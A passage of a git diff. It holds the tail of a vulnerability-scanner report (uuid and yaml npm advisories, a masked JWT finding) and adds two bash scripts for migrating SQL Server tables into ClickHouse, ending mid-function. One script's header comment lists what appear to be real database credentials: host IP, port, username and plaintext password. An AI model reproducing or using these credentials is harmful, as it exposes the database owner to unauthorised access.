Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + } + }, + "References": [ + "https://github.com/uuidjs/uuid", + "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", + "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", + "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" + ], + "PublishedDate": "2026-04-22T20:53:24Z", + "LastModifiedDate": "2026-04-22T20:53:24Z" + }, + { + "VulnerabilityID": "GHSA-w5hq-g745-h8pq", + "PkgID": "uuid@7.0.3", + "PkgName": "uuid", + "PkgIdentifier": { + "PURL": "pkg:npm/uuid@7.0.3", + "UID": "5a74fe9a4bc16ef4" + }, + "InstalledVersion": "7.0.3", + "FixedVersion": "14.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:89c0219cc40408376a779b7f302ed5695d6007192e202c9aabe459869b359003", + "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", + "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + } + }, + "References": [ + "https://github.com/uuidjs/uuid", + "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", + "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", + "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" + ], + "PublishedDate": "2026-04-22T20:53:24Z", + "LastModifiedDate": "2026-04-22T20:53:24Z" + }, + { + "VulnerabilityID": "CVE-2026-33532", + "VendorIDs": [ + "GHSA-48c2-rrv3-qjmp" + ], + "PkgID": "yaml@2.8.1", + "PkgName": "yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/yaml@2.8.1", + "UID": "a31a701f2d1ece72" + }, + "InstalledVersion": "2.8.1", + "FixedVersion": "2.8.3, 1.10.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33532", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:28e9cf287c29080e512d9d80d33a2d37864ee68875b4f56abb24d9166cf24747", + "Title": "yaml: yaml: Denial of Service via deeply nested YAML document parsing", + "Description": "`yaml` is a YAML parser and serialiser for JavaScript. Parsing a YAML document with a version of `yaml` on the 1.x branch prior to 1.10.3 or on the 2.x branch prior to 2.8.3 may throw a RangeError due to a stack overflow. The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2–10 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process. Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation). Note: the library's `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion. All three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`. Versions 1.10.3 and 2.8.3 contain a patch.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33532", + "https://github.com/eemeli/yaml", + "https://github.com/eemeli/yaml/commit/1e84ebbea7ec35011a4c61bbb820a529ee4f359b", + "https://github.com/eemeli/yaml/releases/tag/v1.10.3", + "https://github.com/eemeli/yaml/releases/tag/v2.8.3", + "https://github.com/eemeli/yaml/security/advisories/GHSA-48c2-rrv3-qjmp", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33532", + "https://www.cve.org/CVERecord?id=CVE-2026-33532" + ], + "PublishedDate": "2026-03-26T20:16:15.543Z", + "LastModifiedDate": "2026-04-02T18:11:37.49Z" + } + ] + }, + { + "Target": "PerformicsSrc/src/screens/ReportDetailNew.js", + "Class": "secret", + "Secrets": [ + { + "RuleID": "jwt-token", + "Category": "JWT", + "Severity": "MEDIUM", + "Title": "JWT token", + "StartLine": 687, + "EndLine": 687, + "Code": { + "Lines": [ + { + "Number": 685, + "Content": " const category_name = categoryName;", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " const category_name = categoryName;", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 686, + "Content": " ", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " ", + "FirstCause": false, + "LastCause": false + }, + { + "Number": 687, + "Content": " const auth_token = '********************************************************************************************************************************************************';", + "IsCause": true, + "Annotation": "", + "Truncated": false, + "Highlighted": " const auth_token = '********************************************************************************************************************************************************';", + "FirstCause": true, + "LastCause": true + }, + { + "Number": 688, + "Content": " const myHeaders = new Headers();", + "IsCause": false, + "Annotation": "", + "Truncated": false, + "Highlighted": " const myHeaders = new Headers();", + "FirstCause": false, + "LastCause": false + } + ] + }, + "Match": " const auth_token = '********************************************************************************************************************************************************';", + "Offset": 23959 + } + ] + } + ] +} diff --git a/scripts/mssql_clickhouse_migrate.sh b/scripts/mssql_clickhouse_migrate.sh new file mode 100755 index 0000000..7919ec1 --- /dev/null +++ b/scripts/mssql_clickhouse_migrate.sh @@ -0,0 +1,328 @@ +#!/usr/bin/env bash +# Migrate SQL Server tables into ClickHouse using sqlcmd + clickhouse-client. +# +# Recommended paths: +# - Full database (creates Nullable(String) columns, safe TSV): migrate-db +# - One table via temp file (same safety as migrate-db): migrate-table +# +# Optional "stream" mode pipes sqlcmd straight into ClickHouse (like a manual +# one-liner). Use only when data has no tabs/newlines and NULL handling matches +# your expectations; prefer migrate-table otherwise. +# +# Environment (examples — set in your shell or a sourced file): +# export MSSQL_HOST="43.242.212.54" +# export MSSQL_PORT="21443" +# export MSSQL_USER="Nishant_Dev" +# export MSSQL_PASSWORD='nishant@dev' +# export MSSQL_DATABASE="CPMIndiaBusinessInsight_test" +# export MSSQL_TRUST_SERVER_CERT="1" +# # export MSSQL_ENCRYPT="optional" +# +# export CH_DOCKER_CONTAINER="clickhouse" +# export CH_USER="default" +# export CH_PASSWORD="" +# export CH_PORT="9000" +# export CH_HOST="127.0.0.1" +# export CH_DATABASE="cpm" +# +# export MSSQL_CH_EXPORT_DIR="./mssql_export_all" +# +set -euo pipefail + +SCRIPT_NAME=$(basename "$0") +ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +CORE="${ROOT_DIR}/mssql_to_clickhouse.sh" + +die() { + echo "$SCRIPT_NAME: $*" >&2 + exit 1 +} + +usage() { + cat <TABLE rows from SQL Server discovery. + + stream-table --mssql-table SCHEMA.TABLE [--ch-database DB] [--ch-table NAME] + Pipe: sqlcmd SELECT * | clickhouse-client INSERT FORMAT TabSeparated. + Less safe than migrate-table; for quick tests or clean numeric/text data. + + print-env + Print current MSSQL/CH-related environment (passwords masked). + +Environment defaults this wrapper applies before delegating: + MSSQL_PORT=\${MSSQL_PORT:-1433} + CH_PORT=\${CH_PORT:-9000} + CH_USER=\${CH_USER:-default} + CH_HOST=\${CH_HOST:-127.0.0.1} + CH_DATABASE (or pass --ch-database) — ClickHouse database name, e.g. cpm + +Examples: + export CH_DATABASE=cpm CH_DOCKER_CONTAINER=clickhouse MSSQL_TRUST_SERVER_CERT=1 + $SCRIPT_NAME migrate-table --mssql-table dbo.Category_Execution + $SCRIPT_NAME migrate-db --ch-database cpm --out-dir ./ch_export +EOF +} + +apply_defaults() { + export MSSQL_PORT="${MSSQL_PORT:-1433}" + export CH_PORT="${CH_PORT:-9000}" + export CH_USER="${CH_USER:-default}" + export CH_HOST="${CH_HOST:-127.0.0.1}" +} + +ensure_core() { + [[ -x "$CORE" || -f "$CORE" ]] || die "Missing core script: $CORE" +} + +delegate() { + apply_defaults + ensure_core + bash "$CORE" "$@" +} + +mask() { + local v="${1:-}" + if [[ -z "$v" ]]; then + printf "(empty)" + else + printf "***" + fi +} + +cmd_print_env() { + apply_defaults + cat </dev/null 2>&1; then + return 0 + fi + if [[ -x /opt/mssql-tools18/bin/sqlcmd ]]; then + export PATH="/opt/mssql-tools18/bin:$PATH" + return 0 + fi + die "sqlcmd not found (install mssql-tools18 or add to PATH)" +} + +ensure_mssql_env() { + [[ -n "${MSSQL_HOST:-}" ]] || die "Set MSSQL_HOST" + [[ -n "${MSSQL_USER:-}" ]] || die "Set MSSQL_USER" + [[ -n "${MSSQL_PASSWORD:-}" ]] || die "Set MSSQL_PASSWORD" + [[ -n "${MSSQL_DATABASE:-}" ]] || die "Set MSSQL_DATABASE" +} + +sqlcmd_conn_args() { + local port="${MSSQL_PORT:-1433}" + local server="${MSSQL_HOST},${port}" + local args=( + -S "$server" + -d "$MSSQL_DATABASE" + -U "$MSSQL_USER" + -P "$MSSQL_PASSWORD" + ) + if [[ "${MSSQL_TRUST_SERVER_CERT:-0}" == "1" ]]; then + args+=(-C) + fi + if [[ -n "${MSSQL_ENCRYPT:-}" ]]; then + args+=(-N "$MSSQL_ENCRYPT") + fi + printf '%s\n' "${args[@]}" +} + +ch_default_database() { + printf '%s' "${CH_DATABASE:-default}" +} + +escape_ch_ident() { + local ident="${1:-}" + ident="${ident//\`/\`\`}" + printf "%s" "$ident" +} + +cmd_stream_table() { + apply_defaults + ensure_sqlcmd + ensure_mssql_env + + local mssql_table="" + local ch_db="" + local ch_table="" + while [[ $# -gt 0 ]]; do + case "$1" in + --mssql-table) + mssql_table="$2" + shift 2 + ;; + --ch-database) + ch_db="$2" + shift 2 + ;; + --ch-table) + ch_table="$2" + shift 2 + ;; + *) + die "Unknown option: $1" + ;; + esac + done + + [[ -n "$mssql_table" ]] || die "stream-table requires --mssql-table SCHEMA.TABLE" + ch_db="${ch_db:-$(ch_default_database)}" + if [[ -z "$ch_table" ]]; then + if [[ "$mssql_table" == *.* ]]; then + ch_table="${mssql_table#*.}" + else + ch_table="$mssql_table" + fi + fi + + [[ -n "${CH_DOCKER_CONTAINER:-}" ]] || die "stream-table expects CH_DOCKER_CONTAINER for docker exec -i" + command -v docker >/dev/null 2>&1 || die "docker not found" + + local conn_args=() + mapfile -t conn_args < <(sqlcmd_conn_args) + + local insert_q + insert_q="INSERT INTO \`$(escape_ch_ident "$ch_db")\`.\`$(escape_ch_ident "$ch_table")\` FORMAT TabSeparated" + + echo "$SCRIPT_NAME: streaming SELECT * from $mssql_table → ${ch_db}.${ch_table} (ensure table exists and types match)." >&2 + + local ch_args=( + --host "${CH_HOST:-127.0.0.1}" + --port "${CH_PORT:-9000}" + --user "${CH_USER:-default}" + --query "$insert_q" + ) + [[ -n "${CH_PASSWORD:-}" ]] && ch_args+=(--password "$CH_PASSWORD") + [[ "${CH_SECURE:-0}" == "1" ]] && ch_args+=(--secure) + + sqlcmd "${conn_args[@]}" \ + -Q "SET NOCOUNT ON; SELECT * FROM ${mssql_table}" \ + -h -1 -W -s "$(printf '\t')" -w 65535 -f i:65001,o:65001 -b \ + | docker exec -i "$CH_DOCKER_CONTAINER" clickhouse-client "${ch_args[@]}" +} + +cmd_migrate_table() { + apply_defaults + ensure_core + + local mssql_table="" + local ch_db="" + local out_dir="" + while [[ $# -gt 0 ]]; do + case "$1" in + --mssql-table) + mssql_table="$2" + shift 2 + ;; + --ch-database) + ch_db="$2" + shift 2 + ;; + --out-dir) + out_dir="$2" + shift 2 + ;; + *) + die "Unknown option: $1" + ;; + esac + done + + [[ -n "$mssql_table" ]] || die "migrate-table requires --mssql-table SCHEMA.TABLE" + ch_db="${ch_db:-$(ch_default_database)}" + out_dir="${out_dir:-${MSSQL_CH_EXPORT_DIR:-./mssql_export_all}}" + + local tmp + tmp="$(mktemp "${TMPDIR:-/tmp}/${SCRIPT_NAME}.tables.XXXXXX")" + trap 'rm -f "$tmp"' RETURN + + printf '%s\n' "$mssql_table" >"$tmp" + + bash "$CORE" migrate-db \ + --ch-database "$ch_db" \ + --out-dir "$out_dir" \ + --tables-file "$tmp" +} + +main() { + [[ $# -ge 1 ]] || { + usage + exit 1 + } + + local cmd="$1" + shift || true + + if [[ "$cmd" == "-h" || "$cmd" == "--help" ]]; then + usage + exit 0 + fi + + case "$cmd" in + print-env) + cmd_print_env + ;; + migrate-db) + delegate migrate-db \ + --ch-database "$(ch_default_database)" \ + --out-dir "${MSSQL_CH_EXPORT_DIR:-./mssql_export_all}" \ + "$@" + ;; + list-tables) + delegate list-tables "$@" + ;; + migrate-table) + cmd_migrate_table "$@" + ;; + export-import) + delegate export-import \ + --ch-database "$(ch_default_database)" \ + "$@" + ;; + stream-table) + cmd_stream_table "$@" + ;; + *) + usage + die "Unknown command: $cmd" + ;; + esac +} + +main "$@" diff --git a/scripts/mssql_to_clickhouse.sh b/scripts/mssql_to_clickhouse.sh new file mode 100755 index 0000000..dd429a6 --- /dev/null +++ b/scripts/mssql_to_clickhouse.sh @@ -0,0 +1,665 @@ +#!/usr/bin/env bash +# Bulk copy one SQL Server table to ClickHouse on Ubuntu (or Debian-based). +# +# Prerequisites (or run with --install-deps): +# - sqlcmd: Microsoft mssql-tools18 (/opt/mssql-tools18/bin/sqlcmd) +# - clickhouse-client +# +# Environment (required for export-import): +# MSSQL_HOST e.g. db.example.com +# MSSQL_PORT default 1433 +# MSSQL_USER +# MSSQL_PASSWORD +# MSSQL_DATABASE +# MSSQL_TRUST_SERVER_CERT set to 1 to pass -C (trust self-signed server cert) +# MSSQL_ENCRYPT optional; passed to sqlcmd as -N (e.g. optional|mandatory|strict) +# +# CH_HOST default localhost +# CH_PORT native TCP port, default 9000 +# CH_USER default default +# CH_PASSWORD optional +# CH_SECURE set to 1 to use TLS (--secure) +# +# Example: +# export MSSQL_HOST=sql.mycompany.internal MSSQL_USER=ro MSSQL_PASSWORD='***' MSSQL_DATABASE=sales +# export CH_HOST=ch.mycompany.internal CH_PASSWORD='***' +# ./mssql_to_clickhouse.sh export-import \ +# --mssql-table "dbo.Orders" \ +# --ch-database analytics \ +# --ch-table orders_raw \ +# --out /tmp/orders.tsv +# ./mssql_to_clickhouse.sh migrate-db \ +# --ch-database cpm \ +# --out-dir /tmp/mssql_full_export +# +set -euo pipefail + +SCRIPT_NAME=$(basename "$0") + +die() { + echo "$SCRIPT_NAME: $*" >&2 + exit 1 +} + +usage() { + cat <TABLE (# comments allowed). + Use when MSSQL catalogs hide most tables unless VIEW DEFINITION is granted. + --ch-database DB ClickHouse database (default: \$CH_DATABASE or default) + --ch-table TABLE ClickHouse table name + --out PATH File path (default: ./mssql_export.tsv) + --out-dir PATH Directory for migrate-db TSV files (default: ./mssql_export_all) + +Environment: + MSSQL_HOST, MSSQL_PORT, MSSQL_USER, MSSQL_PASSWORD, MSSQL_DATABASE + MSSQL_TRUST_SERVER_CERT=1 (optional; trust self-signed SQL Server cert with sqlcmd -C) + MSSQL_ENCRYPT (optional; forwarded to sqlcmd -N) + MSSQL_TABLES_FILE optional explicit table list path for migrate-db + CH_HOST, CH_PORT, CH_USER, CH_PASSWORD, CH_SECURE=1 for TLS + CH_DOCKER_CONTAINER optional; run clickhouse-client inside this container + +Notes: + - ClickHouse columns must match export order and types. + - TabSeparated fails if fields contain tab characters; use --mssql-query to sanitize or export CSV elsewhere. + - Very large tables: run multiple exports with --mssql-query and ranges, then import each file. +EOF +} + +ensure_sqlcmd() { + if command -v sqlcmd >/dev/null 2>&1; then + return 0 + fi + if [[ -x /opt/mssql-tools18/bin/sqlcmd ]]; then + export PATH="/opt/mssql-tools18/bin:$PATH" + return 0 + fi + die "sqlcmd not found. Install mssql-tools18 or run: $0 --install-deps" +} + +ensure_clickhouse_client() { + if [[ -n "${CH_DOCKER_CONTAINER:-}" ]]; then + command -v docker >/dev/null 2>&1 || die "docker not found, but CH_DOCKER_CONTAINER is set" + return 0 + fi + command -v clickhouse-client >/dev/null 2>&1 || die "clickhouse-client not found. Run: $0 --install-deps or set CH_DOCKER_CONTAINER" +} + +ensure_mssql_env() { + [[ -n "${MSSQL_HOST:-}" ]] || die "Set MSSQL_HOST" + [[ -n "${MSSQL_USER:-}" ]] || die "Set MSSQL_USER" + [[ -n "${MSSQL_PASSWORD:-}" ]] || die "Set MSSQL_PASSWORD" + [[ -n "${MSSQL_DATABASE:-}" ]] || die "Set MSSQL_DATABASE" +} + +sqlcmd_conn_args() { + local port="${MSSQL_PORT:-1433}" + local server="${MSSQL_HOST},${port}" + local args=( + -S "$server" + -d "$MSSQL_DATABASE" + -U "$MSSQL_USER" + -P "$MSSQL_PASSWORD" + ) + + # ODBC 18 validates cert chains by default; -C is commonly needed for self-signed certs. + if [[ "${MSSQL_TRUST_SERVER_CERT:-0}" == "1" ]]; then + args+=(-C) + fi + if [[ -n "${MSSQL_ENCRYPT:-}" ]]; then + args+=(-N "$MSSQL_ENCRYPT") + fi + + printf '%s\n' "${args[@]}" +} + +sqlcmd_query() { + ensure_sqlcmd + ensure_mssql_env + + local sql="${1:-}" + mapfile -t conn_args < <(sqlcmd_conn_args) + + sqlcmd "${conn_args[@]}" \ + -Q "SET NOCOUNT ON; ${sql}" \ + -h -1 -W -s "$(printf '\t')" -w 65535 -f i:65001,o:65001 -b +} + +run_clickhouse_query() { + ensure_clickhouse_client + + local query="${1:-}" + local host="${CH_HOST:-localhost}" + local port="${CH_PORT:-9000}" + local user="${CH_USER:-default}" + local args=( + --host "$host" + --port "$port" + --user "$user" + --query "$query" + ) + [[ -n "${CH_PASSWORD:-}" ]] && args+=(--password "$CH_PASSWORD") + [[ "${CH_SECURE:-0}" == "1" ]] && args+=(--secure) + + if [[ -n "${CH_DOCKER_CONTAINER:-}" ]]; then + # Important: do not pass -i here, otherwise docker can consume caller stdin + # (e.g. migrate-db table loop) and stop after the first row. + docker exec "$CH_DOCKER_CONTAINER" clickhouse-client "${args[@]}" + else + clickhouse-client "${args[@]}" + fi +} + +run_clickhouse_insert() { + ensure_clickhouse_client + + local query="${1:-}" + local in_file="${2:-}" + local host="${CH_HOST:-localhost}" + local port="${CH_PORT:-9000}" + local user="${CH_USER:-default}" + local args=( + --host "$host" + --port "$port" + --user "$user" + --query "$query" + ) + [[ -n "${CH_PASSWORD:-}" ]] && args+=(--password "$CH_PASSWORD") + [[ "${CH_SECURE:-0}" == "1" ]] && args+=(--secure) + + if [[ -n "${CH_DOCKER_CONTAINER:-}" ]]; then + docker exec -i "$CH_DOCKER_CONTAINER" clickhouse-client "${args[@]}" <"$in_file" + else + clickhouse-client "${args[@]}" <"$in_file" + fi +} + +escape_ch_ident() { + local ident="${1:-}" + ident="${ident//\`/\`\`}" + printf "%s" "$ident" +} + +escape_mssql_ident() { + local ident="${1:-}" + ident="${ident//]/]]}" + printf "%s" "$ident" +} + +# Escape single quotes for literals embedded in MSSQL dynamically built strings. +escape_mssql_sql_literal() { + local s="${1:-}" + s="${s//\'/\'\'}" + printf "%s" "$s" +} + +strip_cr() { + printf '%s' "${1//$'\r'/}" +} + +mssql_discovery_sql_union() { + local schema_filter="${1:-}" + local where_schema_sys="" + local where_schema_is="" + local where_schema_obj="" + local esc="" + if [[ -n "$schema_filter" ]]; then + esc="$(escape_mssql_sql_literal "$schema_filter")" + where_schema_sys="AND s.name = N'${esc}'" + where_schema_is="AND TABLE_SCHEMA = N'${esc}'" + where_schema_obj="AND SCHEMA_NAME(o.schema_id) = N'${esc}'" + fi + + printf "%s" " + SELECT DISTINCT + CAST(x.TABLE_SCHEMA AS nvarchar(256)) COLLATE DATABASE_DEFAULT AS TABLE_SCHEMA, + CAST(x.TABLE_NAME AS nvarchar(256)) COLLATE DATABASE_DEFAULT AS TABLE_NAME + FROM ( + SELECT s.name AS TABLE_SCHEMA, t.name AS TABLE_NAME + FROM sys.tables t + INNER JOIN sys.schemas s ON s.schema_id = t.schema_id + WHERE t.is_ms_shipped = 0 ${where_schema_sys} + + UNION ALL + + SELECT TABLE_SCHEMA, TABLE_NAME + FROM INFORMATION_SCHEMA.TABLES + WHERE TABLE_TYPE = N'BASE TABLE' ${where_schema_is} + + UNION ALL + + SELECT SCHEMA_NAME(o.schema_id) AS TABLE_SCHEMA, o.name AS TABLE_NAME + FROM sys.objects o + WHERE o.type = N'U' AND o.is_ms_shipped = 0 ${where_schema_obj} + ) AS x + WHERE NULLIF(LTRIM(RTRIM(TABLE_SCHEMA)), N'') IS NOT NULL + AND NULLIF(LTRIM(RTRIM(TABLE_NAME)), N'') IS NOT NULL + ORDER BY TABLE_SCHEMA, TABLE_NAME; + " +} + +list_mssql_tables() { + ensure_sqlcmd + ensure_mssql_env + local schema_filter="${1:-}" + sqlcmd_query "$(mssql_discovery_sql_union "$schema_filter")" +} + +migrate_permission_hint() { + cat <&2 + +$SCRIPT_NAME: MSSQL catalogs only expose tables your login may see metadata for. +If migrate-db discovers too few rows, grant read + metadata visibility (run as dbo/sa): + + USE [$MSSQL_DATABASE]; + GRANT VIEW DEFINITION ON DATABASE::[$MSSQL_DATABASE] TO [$MSSQL_USER]; + EXEC sp_addrolemember N'db_datareader', N'$MSSQL_USER'; + +Or migrate using an explicit list from a dbo export: + + $SCRIPT_NAME migrate-db --tables-file ./all_tables.txt --ch-database ... + + all_tables.txt format (one table per line): + dbo.MyTable + sales.Orders + +EOF +} + +mssql_column_expr() { + local col_name="${1:-}" + local data_type="${2:-}" + + local col_escaped + local col_bracketed + col_escaped="$(escape_mssql_ident "$col_name")" + col_bracketed="[${col_escaped}]" + + case "${data_type,,}" in + binary|varbinary|image|rowversion|timestamp) + printf "CASE WHEN %s IS NULL THEN '\\\\N' ELSE master.dbo.fn_varbintohexstr(%s) END AS [%s]" \ + "$col_bracketed" "$col_bracketed" "$col_escaped" + ;; + *) + printf "CASE WHEN %s IS NULL THEN '\\\\N' ELSE REPLACE(REPLACE(REPLACE(CONVERT(nvarchar(max), %s), CHAR(9), ' '), CHAR(10), ' '), CHAR(13), ' ') END AS [%s]" \ + "$col_bracketed" "$col_bracketed" "$col_escaped" + ;; + esac +} + +build_mssql_export_query() { + local schema_name="${1:-}" + local table_name="${2:-}" + local schema_escaped table_escaped + local exprs=() + local line col_name data_type + + schema_escaped="$(escape_mssql_ident "$schema_name")" + table_escaped="$(escape_mssql_ident "$table_name")" + + while IFS= read -r line; do + [[ -n "$line" ]] || continue + col_name="${line%%$'\t'*}" + data_type="${line#*$'\t'}" + exprs+=("$(mssql_column_expr "$col_name" "$data_type")") + done < <( + sqlcmd_query " + SELECT COLUMN_NAME, DATA_TYPE + FROM INFORMATION_SCHEMA.COLUMNS + WHERE TABLE_SCHEMA = '$(escape_mssql_sql_literal "$schema_name")' AND TABLE_NAME = '$(escape_mssql_sql_literal "$table_name")' + ORDER BY ORDINAL_POSITION; + " + ) + + [[ ${#exprs[@]} -gt 0 ]] || die "No columns found for ${schema_name}.${table_name}" + + local select_list + local IFS=", " + select_list="${exprs[*]}" + printf "SELECT %s FROM [%s].[%s]" "$select_list" "$schema_escaped" "$table_escaped" +} + +# Parse one line from --tables-file: SCHEMA.TABLE, SCHEMATABLE, or bare name (dbo default). +parse_mssql_table_line() { + local raw="$1" + local -n _sch="$2" + local -n _tbl="$3" + + raw="$(strip_cr "$raw")" + [[ -z "$raw" ]] && return 1 + [[ "$raw" =~ ^[[:space:]]*# ]] && return 1 + raw="${raw#"${raw%%[![:space:]]*}"}" + raw="${raw%"${raw##*[![:space:]]}"}" + [[ -z "$raw" ]] && return 1 + + if [[ "$raw" == *$'\t'* ]]; then + _sch="${raw%%$'\t'*}" + _tbl="${raw#*$'\t'}" + elif [[ "$raw" == *.* ]]; then + _sch="${raw%%.*}" + _tbl="${raw#*.}" + else + _sch="dbo" + _tbl="$raw" + fi + + _sch="${_sch#"${_sch%%[![:space:]]*}"}" + _sch="${_sch%"${_sch##*[![:space:]]}"}" + _tbl="${_tbl#"${_tbl%%[![:space:]]*}"}" + _tbl="${_tbl%"${_tbl##*[![:space:]]}"}" + + [[ -n "$_sch" && -n "$_tbl" ]] || return 1 + return 0 +} + +migrate_one_mssql_table() { + local ch_db="${1:?}" + local out_dir="${2:?}" + local schema_name="${3:?}" + local table_name="${4:?}" + + local ch_table columns_ddl column_line column_name exported_file export_query + + # Use the same table name in ClickHouse as in SQL Server (no schema__ prefix). + # If two schemas contain the same table name, the second migrate would target the same CH table. + ch_table="${table_name}" + columns_ddl="" + + while IFS= read -r column_line || [[ -n "$column_line" ]]; do + column_line="$(strip_cr "$column_line")" + [[ -n "$column_line" ]] || continue + column_name="$column_line" + if [[ -n "$columns_ddl" ]]; then + columns_ddl+=", " + fi + columns_ddl+="\`$(escape_ch_ident "$column_name")\` Nullable(String)" + done < <( + sqlcmd_query " + SELECT COLUMN_NAME + FROM INFORMATION_SCHEMA.COLUMNS + WHERE TABLE_SCHEMA = '$(escape_mssql_sql_literal "$schema_name")' AND TABLE_NAME = '$(escape_mssql_sql_literal "$table_name")' + ORDER BY ORDINAL_POSITION; + " + ) + + [[ -n "$columns_ddl" ]] || { + echo "Skipping ${schema_name}.${table_name}: no columns readable in INFORMATION_SCHEMA" + return 1 + } + + run_clickhouse_query "CREATE TABLE IF NOT EXISTS \`$(escape_ch_ident "$ch_db")\`.\`$(escape_ch_ident "$ch_table")\` (${columns_ddl}) ENGINE = MergeTree ORDER BY tuple()" + + export_query="$(build_mssql_export_query "$schema_name" "$table_name")" + exported_file="${out_dir}/${schema_name}.${table_name}.tsv" + run_export "" "$export_query" "$exported_file" + run_import "$ch_db" "$ch_table" "$exported_file" + + echo "Migrated ${schema_name}.${table_name} -> ${ch_db}.${ch_table}" + return 0 +} + +run_migrate_db() { + ensure_sqlcmd + 